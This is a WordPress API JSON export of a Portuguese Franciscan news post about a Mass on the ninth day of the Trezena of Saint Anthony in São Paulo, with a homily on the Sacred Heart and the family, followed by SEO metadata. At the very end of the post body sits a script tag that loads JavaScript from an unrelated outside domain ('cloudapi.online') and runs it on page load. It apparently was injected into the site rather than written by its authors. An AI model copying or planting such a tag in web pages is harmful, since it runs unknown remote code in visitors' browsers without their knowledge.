{"id":162691,"date":"2018-06-09T09:54:27","date_gmt":"2018-06-09T12:54:27","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=162691"},"modified":"2019-01-03T10:15:34","modified_gmt":"2019-01-03T12:15:34","slug":"e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html","title":{"rendered":"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena"},"content":{"rendered":"<p><strong>S\u00e3o Paulo (SP) &#8211;<\/strong> No dia 8 de junho, a Celebra\u00e7\u00e3o Eucar\u00edstica das 19 horas, presidida Frei Clauzemir Makximovitz e concelebrada por Frei Gustavo Medella, na Par\u00f3quia Santo Ant\u00f4nio do Pari, em S\u00e3o Paulo (SP), uniu dois grandes motivos para celebrar: a Solenidade do Sagrado Cora\u00e7\u00e3o de Jesus e tamb\u00e9m o 9\u00ba dia da Trezena de Santo Ant\u00f4nio. Segundo o pregador, a Solenidade do Sagrado Cora\u00e7\u00e3o \u00e9 \u201cuma festa em que transparece visivelmente o Amor de Deus, que faz com que seu cora\u00e7\u00e3o literalmente n\u00e3o caiba em seu peito\u201d, disse Frei Clauzemir.<\/p>\n<p>Para ele, a representa\u00e7\u00e3o do Sagrado Cora\u00e7\u00e3o \u00e9 muito significativa, pois aponta para um Deus que sente, que ama, e cujo amor pulsa em nossa dire\u00e7\u00e3o de uma forma que n\u00e3o pode ser contida. \u201cNem leis, nem tradi\u00e7\u00f5es, nem preconceitos conseguem conter ou barrar o Amor de Deus\u201d, acentuou.<\/p>\n<p>Para os judeus, cuja cultura Jesus foi educado, o cora\u00e7\u00e3o \u00e9 o centro do ser humano, devido \u00e0 import\u00e2ncia simb\u00f3lica do sangue, que representa a pr\u00f3pria vida. O cora\u00e7\u00e3o do ser humano \u00e9 o cerne do ser humano.<\/p>\n<p>\u201cN\u00e3o tem nada a ver com sentimentalismo ou &#8216;paixonites&#8217;, essa rela\u00e7\u00e3o \u00e9 tardia, da \u00e9poca do romantismo ou algo assim. O Cora\u00e7\u00e3o de Deus \u00e9 onde n\u00f3s habitamos envolvidos por sua miseric\u00f3rdia e seu amor. E a festa de hoje nos leva a questionarmos o que n\u00f3 guardamos em nosso cora\u00e7\u00e3o? \u00a0O que mantemos de verdadeiramente precioso em nossas vidas, a ponto de proteger no centro de nosso cora\u00e7\u00e3o. Para o que, ou para quem, sempre temos tempo e nunca estamos cansados? Quais sonhos, objetivos, projetos n\u00e3o abrimos m\u00e3o, nem sequer gostamos de discutir, de t\u00e3o assumidos que j\u00e1 s\u00e3o?\u201d, refletiu o celebrante.<\/p>\n<p><img loading=\"lazy\" class=\"alignleft size-full wp-image-162693\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_pari_090618.jpg\" alt=\"trezena_pari_090618\" width=\"308\" height=\"482\" \/>E continuou: \u201cExatamente tudo isso \u00e9 que guardamos em nossos cora\u00e7\u00f5es. E muitas e muitas vezes, s\u00e3o coisas que s\u00f3 o fazem pesar, e sofrer. Quanta ang\u00fastia, quanta m\u00e1goa fazemos quest\u00e3o de guardar em nossos cora\u00e7\u00f5es, ocupando espa\u00e7o precioso que deveria ser das coisas realmente importantes em nossa vida, mas insistimos no rancor que s\u00f3 nos fere e faz sofrer. Quantas hist\u00f3rias ouvimos em confession\u00e1rios de pessoas que h\u00e1 anos n\u00e3o se falam, e nem lembram mais porque, mas insistem na m\u00e1goa. \u00c9 preciso limpar, purificar nossos cora\u00e7\u00f5es, arrumar espa\u00e7o para que Deus, o nosso Deus, misericordioso, amoroso, seja o centro de nossa vida\u201d, ensinou o jovem frade.<\/p>\n<p>Discorrendo sobre o tema do dia \u201cSanto Ant\u00f4nio o Santo das Fam\u00edlias\u201d, Frei Clauzemir afirmou que \u00e9 na fam\u00edlia que se cultivam os sentimentos mais fortes e importantes. \u201cJunto \u00e0queles que nos s\u00e3o dados como fam\u00edlia, e \u00e0queles com os quais nos aproximaremos como fam\u00edlia. As pessoas que com quem realmente nos importamos, essas guardamos no cora\u00e7\u00e3o. Essas s\u00e3o nossa fam\u00edlia. Isso porque fam\u00edlia tem mais a ver com cuidado do que com sangue, com respeito, carinho, do que com compromissos legais. Ser familiar a algu\u00e9m \u00e9 ser pr\u00f3ximo, presente, conhecido na intimidade da conviv\u00eancia\u201d, destacou o frade.<\/p>\n<p>E concluindo sua homilia, disse: \u201cSomos todos fam\u00edlia de Deus, pois Ele nos conhece em nosso \u00edntimo. Santo Ant\u00f4nio era muito procurado tamb\u00e9m para ajudar a resolver desentendimentos dentro das fam\u00edlias. Como somos at\u00e9 hoje, o padre, o frei \u00e9 muito procurado para aconselhar naquilo que devia ser muito simples, naquilo que devia ser pautado no amor, e que acaba resvalando e caindo no orgulho, gerando m\u00e1goas. Geralmente, n\u00f3s mais magoamos as pessoas que est\u00e3o mais pr\u00f3ximas de n\u00f3s, porque s\u00e3o elas que se importam conosco, s\u00e3o elas que criam expectativas quanto a n\u00f3s. Aprender a valorizar e respeitar isso \u00e9 se parecer um pouquinho mais com nosso Deus, sempre t\u00e3o carinhoso e presente. Quantas pessoas, em nossa vida, cuidaram e ainda cuidam de n\u00f3s, torcem pela nossa felicidade, nos apoiam sempre que necess\u00e1rio\u201d, frisou o celebrante.<\/p>\n<p>E desejou: \u201cSaibamos agradecer a Deus por nossa fam\u00edlia, honrar esse sentimento fazendo o melhor com nossa vida, vivendo bem, para o bem e construindo um mundo melhor para todos\u201d, concluiu.<\/p>\n<p>O 10\u00ba dia da Trezena de Santo Ant\u00f4nio ser\u00e1 neste s\u00e1bado (9\/6) e ter\u00e1 como tema \u201cSanto Ant\u00f4nio o Santo da Paci\u00eancia\u201d. A celebra\u00e7\u00e3o Eucar\u00edstica ser\u00e1 as 16 horas. Tamb\u00e9m neste s\u00e1bado a partir das 17 horas, e nos pr\u00f3ximos dias (10,13,16,17\/06), acontece a festa externa com barracas e comidas t\u00edpicas. Prestigie!<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Par\u00f3quia Santo Ant\u00f4nio do Pari<\/p>\n","protected":false},"author":1,"featured_media":193679,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[287,389],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Par\u00f3quia Santo Ant\u00f4nio do Pari\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-09T12:54:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-01-03T12:15:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_pari_090618_1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_pari_090618_1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_pari_090618_1.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html\",\"name\":\"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#primaryimage\"},\"datePublished\":\"2018-06-09T12:54:27+00:00\",\"dateModified\":\"2019-01-03T12:15:34+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html","og_locale":"pt_BR","og_type":"article","og_title":"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena - Not\u00edcias - Franciscanos","og_description":"Par\u00f3quia Santo Ant\u00f4nio do Pari","og_url":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-06-09T12:54:27+00:00","article_modified_time":"2019-01-03T12:15:34+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_pari_090618_1.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_pari_090618_1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_pari_090618_1.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html","name":"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#primaryimage"},"datePublished":"2018-06-09T12:54:27+00:00","dateModified":"2019-01-03T12:15:34+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/e-na-familia-que-se-cultivam-os-sentimentos-mais-importantes.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Ant\u00f4nio, o Santo das Fam\u00edlias \u00e9 o tema do 9\u00ba dia da Trezena"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/162691"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=162691"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/162691\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/193679"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=162691"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=162691"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=162691"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}